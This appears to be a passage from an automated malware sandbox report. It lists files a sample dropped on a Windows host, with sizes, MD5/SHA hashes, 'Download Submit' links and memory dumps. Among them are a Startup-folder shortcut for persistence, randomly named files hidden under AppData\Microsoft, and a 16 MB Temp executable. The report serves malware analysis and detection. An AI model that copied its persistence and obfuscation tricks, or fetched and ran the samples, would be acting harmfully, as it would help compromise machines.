C:\Users\Admin\AppData\Roaming\MIcROsoFt\wInDowS\sTARt MenU\PRograMS\staRtUP\a81132a821948785c704c56b34d98.lNK

Filesize
994B

MD5
201fb405de26563d47e7d04b490c9198

SHA1
ac6796f97c1622b9d17b19f8025126e25796a1e8

SHA256
d05c939431f93f66270599414d20ef43f2da17e47a6935c5a8c09ea08e9ccb7d

SHA512
19ee07fbba5ff90cba299f7d3652611edd44ab339cabfbcc85412da11bd673d299fe35cf9bbf194aefd834ae46ec14be8eb933b358e2483e9c65727b720ec665

Download Submit
C:\Users\Admin\AppData\Roaming\MIcROsoFt\wInDowS\sTARt MenU\PRograMS\staRtUP\a81132a821948785c704c56b34d98.lNK

Filesize
1KB

MD5
0488a184e2af07c09879e93da2576dea

SHA1
9c4a91cb8f8d59ed76caf0e80af511ad5e10beef

SHA256
3bc3bc4f331cb7c9bc296d76867c7eb63199d53f6dc72cd7ea0650573e2ca842

SHA512
17a83af09ffb999f1f0673125dc9d2f853317af23ec5a47d39a30034b43ff1a9150de730ab2df9d38f50490b81ee22dd46fbe0c82d08e8b6f9b16dd1e274d7e8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\COskKguFjmLVndlUJ\VPbOdDIushrNTXEk.xQhKuENcwDZjIHPO

Filesize
71KB

MD5
afe90b488cb06479a296c250ee57c08a

SHA1
4a8cf5081b063ee96962dca44faaebd891017215

SHA256
0601aad7cbfcf7105ea7837dc6a75a1297347ce3c5da268114458d97ef60e983

SHA512
6a93593365906759c5b97ee956e831d95250bc8dfcaae70b4f861c01d8cc3fb906df18352ab883bcffbff85526f9a0e873081e7709cdd8cf5172da7dfc6dbfa7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\COskKguFjmLVndlUJ\WAPvaZnQUdebjglCtDy.SUubBGLNOg

Filesize
57KB

MD5
3d38682ff090fe7282721f0cb5deb63c

SHA1
112394b99916da1e6568d1971c0de9efcbba80a2

SHA256
9a3544bf406bedec68ac6301cf179511ad7faaee9db47b3aac011e80802aaa7d

SHA512
277d0680076e8701adca27d7e83d8adc706c07138583c545bbabfcf20d344c6117201c176bdcbddcfe492e40ed8691cbf79fdb5395d66d3fe272312dbf48114c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\COskKguFjmLVndlUJ\pCTBlVdDtMcAmIZJR.TnigrNtmZIHeRpGJvyl

Filesize
122KB

MD5
2f7c0f8a64b928d666eac090f4eba76e

SHA1
19ac78d384faecf736291c1f97788253c5eb9191

SHA256
e37c77a8ba8a8a4924539009b8426abd46f3a1ba8acb3e8f0742e63e59709e77

SHA512
f717e303ce1857f87c1083d776e05795a21cfff32ef46836352269704a46fa570fb6fa13ffa76219256f9401ee007c8535c2506ee56963069e8bca9aeb87b589

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\EdUJgynPpQOZm\JtxHreXuUBIEjLwosGO.LZtKUQTPcSxvIDijBea

Filesize
99KB

MD5
5a7b2d30ae813c9a123adcd90af8f68b

SHA1
3d4cd363e8887ffd7e5c8c055e424cfedf389322

SHA256
95d017799c5ead634e30a52a5888165b48a88ad8201d3a62d8561982acc5ec74

SHA512
66764b7cf677345234ecea0a2589ee6d7a3f5a98a0752ae568966657655ca776b293d097198d2d5e8adc5f56166975ac4e94329ecd6883181d916116dba88dba

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
e6388bfa3dbeb0fec0ea9e36634da708

SHA1
6f5e4632e05e88cb7f1617c5d987dd6178fa2cfe

SHA256
47ed520686b8ae04250634ff7915e1a91f129e3182bb4ec57c0f0fc7b8f0769b

SHA512
14cdd402555c5dee672898ecf8edfdc9095565d1c2d308dd3aab6d6462648ceb90bd7b23132a8a22369997a9025e4da9a4bbfc27de297f9716cf626bc8a3ce6a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\XsjSvKtbwhD\AJMnoIGsxhyaCTtFfEu.AtVQjmKUgrMd

Filesize
92KB

MD5
79798b7ebd42828b1f6c48afb5d41ced

SHA1
ca02b801431a5407ee76fb86333deffae6ca812d

SHA256
7e7d76a727aab290096703048f1c0155463af57bb79c1b766cb5a3eb1f6c0f0a

SHA512
8076f1172a608b7943247124774fd2f1ba6084b1786badbb552e1555d2fbc77a3df8008f2143d4d25cc6f34cd53cbdebc3f3ded7e74ba8118c2bb3faaa975d7d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\XsjSvKtbwhD\EzcbJiNZuqaInD.bAglWQNDwqUS

Filesize
92KB

MD5
a4e8686507e46ba9bec6eebeaed3f5ca

SHA1
8ecf515747fa08535a4417cfafc8279b864f4d4f

SHA256
b297d3364c21e2faa4e37beafda0fb328567459d649b193234a3aa6d72017a6b

SHA512
3804caa5c932ffd0a0de8a465aadcab7a6f19b65535fc64d0a47fefab867599acddd7722af17e0c8ae351d561372b917149140db25ba9d2539caa4c0c344920b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\XsjSvKtbwhD\OtJifywHaRUmAgIXP.HUoNcPphfmuDvFZQYJ

Filesize
102KB

MD5
22bb0094ac06f9a73b27448ad803f008

SHA1
20fe39a457e69966040d1b1390d142154896716d

SHA256
15427e30714e5dd7bb39eca697e8c293cbd15215de74d94db29b23b69da1d059

SHA512
6d8ec488c178b58079e07d59ca02ed1550dc92e1ccf972da70ca985b41d4e26cb105360f73f5a21057d853caf7b90ec9b039eb8352def870124d456fd3587b57

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\XsjSvKtbwhD\RvPodTXSyUjr.PvUCJGsMOBSWA

Filesize
112KB

MD5
15e6cd510be75901ae208e41d29c878c

SHA1
82476e2dbf128efa6e9ee9867204ad0a9cd08f84

SHA256
f0b40ceb201264a0249c8b2fb0fda6507cc55a954248914f3ebd64657cb5590a

SHA512
f7ed028cafc0d47d660747a9bf2dcdb79e13b1b23fe3b400fb7b04bbb6be7e49592fed7a7b8eb5ea568f7a305a9de3eac6c2d4f031e2d67da5fe31674ac74c88

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\XsjSvKtbwhD\VWqzLlkFIYyaUbi.hbrFnymIaEeJvg

Filesize
163KB

MD5
39382a64540114b25cca76075fa6b46d

SHA1
1303bc9529420a1602b675ddde370ff3933a4241

SHA256
ccda8c64b18bfca969c0914996f006d628a9b17ea32247812c6fe0d914217287

SHA512
a17aa69c127c9d5b8f7240726b40deae9af51ec4ebbd0421bad6e7ca4a757f79c1b471fe0add0c40d250f61ac140179e348230ccbdf7c7f6dcb39d064ee33875

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\XsjSvKtbwhD\qBFytOhzxfkcQ.qewaCbzVHInMcGQiUXt

Filesize
164KB

MD5
a395dd3abcaec591f442fa79649b1965

SHA1
94486f7dc53e88b885584818c6d4aecb77b08008

SHA256
416f6a72c5ec4b71f8753752f67e0a2b97f2aca60c50e9fa0b783467df692e15

SHA512
432a9965ff9f3f69a63530b255e07c55f5c82142069c5b489736ab89436ec75a6702aa377639c8709d46164deb2817576d452ef3c29e76a17abbc1917ff2cebf

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\jaTqFeEXVZJSlyMmtND\bDUzwiIERgvL.xwfXUQampL

Filesize
84KB

MD5
99d1b905fed8bde04696391284788822

SHA1
a048c8becae2dc12de86e07a05a4a7f6a9eb8ec8

SHA256
afba2f8a973a57173660128118c5bb36c2e527ca4fe35bde85ba5bed1f4755c0

SHA512
2f261b39497c56a1173fff9c2e6c94336e6040881d2a4fc2c29c11f5be4078f51cb90332f85cde57c0f80f6a0d50a27fbef87ebf77018ac1c6158b9e306b7f70

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\jaTqFeEXVZJSlyMmtND\rzjHpCYOGIhBLvdFTZU.gYwDjNLSyR

Filesize
68KB

MD5
e87a9eeeb59a4e70189b965ad8dc2ef9

SHA1
34d692e4aac5442437ac24d019153bd9c1608f7c

SHA256
6ddf005c71a8e87841d0ed771828a946e9d172a7a8a329347e463fd227acde99

SHA512
505c631b793b2b254a8b3556167304573398c7af031fa268f41d207789e4ba1d0a7bd3af196388e66ff62fbc0787712d8b407657c6053d2a9daa20dbddb26cc4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\nWRyAMKOIcezf\FGmeAPwKIOx.HcBgtUPiLyqXVMr

Filesize
161KB

MD5
012aa4fa88e09465b6b9bef5070dad26

SHA1
746987e1e946ed2994a767ee28f2497af24ab3b3

SHA256
0c5da9b74615df882b92a39bf336eecc606b9a92bba9fb0fa30fc25153649f87

SHA512
798a37c33f6e4e1819de78d3904f3194606a97e434a35564d4e6402587d8113cfc360e35d3edf2b95ea4bf6fe5ba131081ec4ec05820b53c45dc090efa275f88

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\nWRyAMKOIcezf\cLnCQhKOMlVBpd.vgCHfXkSwBnMjrsGl

Filesize
135KB

MD5
ef169a9b15f69959ee2a2380c6bfe01f

SHA1
da7ee3072bb6880ffcaa1dd51fac0b2b5aede4b1

SHA256
b1809ede58f8bd96c203d81fcd77e4bc25e25ad132d9dc981cfda625f84e2c01

SHA512
7f602c85458cba4ce2bd5e91bb06c63f18a88afb1fc86957c0bef5f3395e59b87e16b12c97f48058bc72eb9082d4fee78a5cbea9d9dbfbf61bd7b8c15c1e65ff

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\nWRyAMKOIcezf\ipLERBMAszhTkU.PCrURkXYnJZhlHbMAg

Filesize
124KB

MD5
6c461103260d1df577b2badb34b4d7aa

SHA1
8a2a5b374b17aff24736ecd402c09c8305ec42cf

SHA256
507a475bdf72aa80002187c49b0719132d0da136c818c37aad2c20510fad1871

SHA512
426e7682b58e0ebc54023d8fa59f722be6a3bf53a511bf7e68697f5b4a593c4d969572b75aa53c9df2eb3c0cf575bc05842600933f2c29c29a6aff3c795b878e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\nWRyAMKOIcezf\jxvwhmBEKZNSfV.XHcoYVpbUaiAmkr

Filesize
89KB

MD5
43957592d076b938305f685930e229ac

SHA1
75c575efab76895cea2250c0875fae6c89c69a80

SHA256
3ee7c38868988792cde1cf13d5ee79d0f44de9c87a4f8fbfe8b76aba2757297e

SHA512
c229282ccb9991aa6a938378ef0a95d695199ce3def59a7f8bc511bd36c1afa2cd9750bb3f2c9947f005e5c2b150b03ba524b34bbf12c63795043012edcbad69

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\nWRyAMKOIcezf\mIGlWKobwFEqig.zoJcfWkBhZuR

Filesize
82KB

MD5
f2a9091a240cb236cfb08bf97580325e

SHA1
23f4cfcc4b19be3af0785eb4018c6cc4f04fd9dc

SHA256
cedcc34b34d74817b8dd2667e2fd2fc93aa9013f5723bd9cd53f5e60cf7db065

SHA512
1d80c473604184bcc2e2ec281a0134abf8befb6540e1c407347f28ea35d71c15aa2bce6bab9f0985f75682174b3c5f65c8537c4007e294bdd7bbe109218354a7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\nWRyAMKOIcezf\oCQpDRxluA.qzOxJZnFPLWuVkdsjYB

Filesize
151KB

MD5
270007023cf3bec1449d4ddf7616368c

SHA1
950b3534799ba757f4e9cc07cd4f3b38aa1ea193

SHA256
313c1a3c67d757e151aad091866a7ef1677548b0469a79cfaf3aee70ce2ac7da

SHA512
cd00a19c9412aed130cb4cb039b56e6f6e18f67f429917d0587864abf1955e13c9acb0dee29b7b7f2030956af629cd7b93aecc14a293bf13769a6b42ad08e321

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\tEMTHYzfBIuCswODKRj\JeTDfkNyjz.oYilJvXmyQdCPrcBjf

Filesize
135KB

MD5
04a67b6b96ba208d2bfe4789c5d7921c

SHA1
b85f1ba2040de939f741c3130bb2499ebb80774a

SHA256
cb3a3fbfd900adf5d191ff9b0e019beea727c98e6714dcd9c292d9689f62d5e3

SHA512
1cb253aa152c2f882926ba3272cda6e2988617a2132ba6b857b7b014ebf4864c183ae9934354e09863d133c899fbc78fedfd9cf708c5040a8974ac7f1753bc31

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\tEMTHYzfBIuCswODKRj\URpaXTuxeydrh.dwPOJZsljIMAB

Filesize
95KB

MD5
7c70b8a4da52eb90f71072ce5ee6b507

SHA1
90dbd32b5df15ab912aa29cb373832bbc63c4807

SHA256
d987dfecaf99a3427b8e6d18b4f78c453d62d51171053fc907a79a7d0dc86597

SHA512
bd5f5bf7f917987dc6e0a514842834404e7b73e83d8dfa298e962cb0d3ff8a543db218d4ea0355fa3168862a234c19a1f3154c27a51f8d82ee4fbb4bb79850ce

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\tEMTHYzfBIuCswODKRj\djfCcmKbZELTPVzqIe.gxeWyKGJDZFEsaYP

Filesize
188KB

MD5
4d86e598589853cfa0faa61bc2019f55

SHA1
7cbeac052ff70694684c2286703c90cb8a04f66a

SHA256
f11c85ea3552134ee605d8e845a30fd9050afed5f181530a2bf08f75ce780320

SHA512
8a7751f2d3b88843a454c904e6caaa5f35df3a7c8c38c776dff7125420105e9e430a55a32aeb4760d158c2f39f1e3749ecc3971f9c61ec6a0bce53f270578fe4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\tEMTHYzfBIuCswODKRj\zLkIvwiXKg.VQJRsjdBctiohINpmw

Filesize
166KB

MD5
a204b25962179c04e4bd9fd25ad03c88

SHA1
d9ac8cfed3e5732476b3ee35da1c38978c6d48dc

SHA256
00b8b9cc43ca78d04f95c9b2b6d56a06840b8b8a4fdcb92152ffe692c4b51a42

SHA512
6560cb7219a88a24ed2b665d17e1bb637d779642b4170d02a5d4334efe2ae3ccdd67c61b1f5868b942c4a9d94e46fb43653299d7f811a3b9333d587ef137af34

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\tEMTHYzfBIuCswODKRj\znIKPVXQODR.tLSHNsJWcmZfxAOq

Filesize
93KB

MD5
fafb8f7b99c677fa131fc554aba8653f

SHA1
db69931753762a9306718d7da20a59e7d99f540b

SHA256
8d5b5fe5b634a256a5e618e1562b560c4059362e63efd02541f5cddb357a9978

SHA512
61c775dfdb9556eda72a8d155d9d7c00283910f78ed26d8f7353f765f1e082cd96fa0d06c27bb1cb0b5c6969cf93d363fa35e826d57fb4e40985be196f53edb6

Download Submit
\Users\Admin\AppData\Local\Temp\CMmnnjAi1984unbd.exe

Filesize
16.1MB

MD5
cb777c669a7756c471902cd7e4bb2382

SHA1
34915534d6090ff937a09b4298d8edd0b3b68844

SHA256
83b50b18ebfa4402b2c0d2d166565ee90202f080d903fd15cccd1312446a636e

SHA512
b3cb5b8e0cb35c41d0f3a022be488b1b41e907c840a9188e1c17a16bcd1ff470051fb7bc445801b6099881ad020e469ca0dd30ce5814cbb82e4f2aa426501007

Download Submit
memory/2352-0-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/2352-11-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download